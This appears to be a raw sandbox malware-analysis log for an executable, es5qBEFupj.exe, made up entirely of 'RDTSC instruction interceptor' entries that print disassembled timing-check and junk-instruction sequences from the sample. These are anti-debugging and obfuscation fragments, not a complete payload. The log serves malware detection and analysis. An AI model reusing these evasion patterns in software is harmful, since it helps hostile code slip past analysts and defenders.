Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C597 second address: C5C59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C59B second address: C5C5B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C5B9 second address: C5C65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 0BD1CE06h 0x0000000d mov edi, ebx 0x0000000f push 00000003h 0x00000011 jp 00007F8AF10CF429h 0x00000017 sub ch, FFFFFF99h 0x0000001a push 00000000h 0x0000001c jmp 00007F8AF10CF432h 0x00000021 push 00000003h 0x00000023 mov dl, cl 0x00000025 pushad 0x00000026 add esi, dword ptr [ebp+122D3B23h] 0x0000002c add dword ptr [ebp+122D2985h], esi 0x00000032 popad 0x00000033 push 98CAF2A1h 0x00000038 jmp 00007F8AF10CF430h 0x0000003d xor dword ptr [esp], 58CAF2A1h 0x00000044 jl 00007F8AF10CF42Ch 0x0000004a lea ebx, dword ptr [ebp+124561E3h] 0x00000050 add dword ptr [ebp+122D262Ch], esi 0x00000056 xchg eax, ebx 0x00000057 pushad 0x00000058 jc 00007F8AF10CF437h 0x0000005e jmp 00007F8AF10CF431h 0x00000063 jmp 00007F8AF10CF42Fh 0x00000068 popad 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d pushad 0x0000006e popad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C65E second address: C5C663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C786 second address: C5C7CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8AF10CF432h 0x0000000e popad 0x0000000f popad 0x00000010 xor dword ptr [esp], 74BD12A7h 0x00000017 movsx edx, di 0x0000001a mov dword ptr [ebp+122D3494h], ebx 0x00000020 lea ebx, dword ptr [ebp+124561EEh] 0x00000026 jmp 00007F8AF10CF42Ch 0x0000002b xchg eax, ebx 0x0000002c push edx 0x0000002d push esi 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C6EA48 second address: C6EA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C6EA4C second address: C6EA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C6EA50 second address: C6EA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C6EA56 second address: C6EA5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C6EA5B second address: C6EA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C7DF30 second address: C7DF49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF435h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C7DF49 second address: C7DF71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F8AF15A7F56h 0x00000009 jmp 00007F8AF15A7F61h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007F8AF15A7F6Ch 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C7DF71 second address: C7DF7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C7C2A4 second address: C7C2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8AF15A7F56h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pushad 0x00000010 js 00007F8AF15A7F58h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C7C2C0 second address: C7C2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF42Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C70EE6 second address: C70EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C70EEA second address: C70F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF42Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C70F00 second address: C70F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C70F04 second address: C70F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C7D099 second address: C7D0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C7D703 second address: C7D707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C7DDD9 second address: C7DDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C7DDE3 second address: C7DE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8AF10CF426h 0x0000000a popad 0x0000000b jmp 00007F8AF10CF42Ah 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C834EA second address: C834F4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4C0D9 second address: C4C0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007F8AF10CF426h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4C0E6 second address: C4C0F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F8AF15A7F56h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4C0F6 second address: C4C0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4A56E second address: C4A572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4A572 second address: C4A586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8AF10CF426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F8AF10CF426h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4A586 second address: C4A5A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F8AF15A7F5Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F8AF15A7F56h 0x00000013 jl 00007F8AF15A7F56h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4A5A8 second address: C4A5FC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8AF10CF426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F8AF10CF437h 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F8AF10CF42Ch 0x0000001f jmp 00007F8AF10CF42Fh 0x00000024 push edx 0x00000025 pop edx 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b jnp 00007F8AF10CF426h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4A5FC second address: C4A600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C4A600 second address: C4A606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C89E53 second address: C89E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8A64D second address: C8A659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8AF10CF426h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8BEBD second address: C8BEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8BEC1 second address: C8BECB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF10CF426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8BECB second address: C8BEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8AF15A7F63h 0x0000000d jns 00007F8AF15A7F56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8BEEC second address: C8BEF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8BEF0 second address: C8BF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF15A7F63h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8BF09 second address: C8BF35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8AF10CF42Fh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8AF10CF42Ah 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jng 00007F8AF10CF430h 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8C6C0 second address: C8C6CA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8C6CA second address: C8C6D4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8AF10CF42Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8C9E5 second address: C8C9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8C9EB second address: C8C9F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8CD2C second address: C8CD30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8D42B second address: C8D43D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8AF10CF426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8D43D second address: C8D443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8D7A0 second address: C8D7A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8D7A5 second address: C8D7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF15A7F60h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jp 00007F8AF15A7F5Ch 0x00000015 mov esi, dword ptr [ebp+122D3A63h] 0x0000001b sub dword ptr [ebp+122D3494h], ebx 0x00000021 xchg eax, ebx 0x00000022 jmp 00007F8AF15A7F5Dh 0x00000027 push eax 0x00000028 pushad 0x00000029 jne 00007F8AF15A7F5Ch 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8F69C second address: C8F6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9015D second address: C90166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8FF4A second address: C8FF50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C90166 second address: C901E7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d jmp 00007F8AF15A7F5Ch 0x00000012 pop ecx 0x00000013 nop 0x00000014 mov edi, 4D797500h 0x00000019 adc di, 57C9h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F8AF15A7F58h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a mov esi, dword ptr [ebp+122D3B13h] 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007F8AF15A7F58h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000014h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c mov esi, edx 0x0000005e sub dword ptr [ebp+122D1BDCh], eax 0x00000064 xchg eax, ebx 0x00000065 push eax 0x00000066 push edx 0x00000067 je 00007F8AF15A7F58h 0x0000006d push eax 0x0000006e pop eax 0x0000006f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C901E7 second address: C901F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C901F5 second address: C901F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C90CD2 second address: C90CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C90CD8 second address: C90CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 pushad 0x00000008 jbe 00007F8AF15A7F56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C91807 second address: C91812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8AF10CF426h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C91812 second address: C91817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C91817 second address: C9181D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9154F second address: C91554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C91554 second address: C9155E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8AF10CF42Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9155E second address: C9156E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jo 00007F8AF15A7F5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C921FF second address: C9225C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F8AF10CF435h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F8AF10CF428h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dword ptr [ebp+1247B8FFh], ebx 0x0000002e push 00000000h 0x00000030 sub dword ptr [ebp+122D28FAh], edi 0x00000036 push 00000000h 0x00000038 add dword ptr [ebp+12450624h], ecx 0x0000003e push eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9225C second address: C92265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C92265 second address: C92269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C980A3 second address: C980B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8AF15A7F56h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C980B2 second address: C980B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C9347B second address: C93480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C980B6 second address: C980BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C980BA second address: C980C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C986B6 second address: C986BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C986BA second address: C986C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C986C7 second address: C986D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F8AF10CF426h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C986D5 second address: C986D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C986D9 second address: C98756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F8AF10CF428h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1C46h], edi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F8AF10CF428h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 clc 0x00000045 push 00000000h 0x00000047 jo 00007F8AF10CF428h 0x0000004d mov bl, 17h 0x0000004f js 00007F8AF10CF42Ch 0x00000055 mov dword ptr [ebp+122D1C9Eh], eax 0x0000005b xchg eax, esi 0x0000005c jmp 00007F8AF10CF435h 0x00000061 push eax 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C99703 second address: C99743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F8AF15A7F68h 0x00000010 pushad 0x00000011 jnp 00007F8AF15A7F56h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C99743 second address: C997AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F8AF10CF428h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 jne 00007F8AF10CF42Fh 0x00000027 movsx edi, dx 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D3B5Bh] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F8AF10CF428h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push eax 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jne 00007F8AF10CF426h 0x00000058 rdtsc
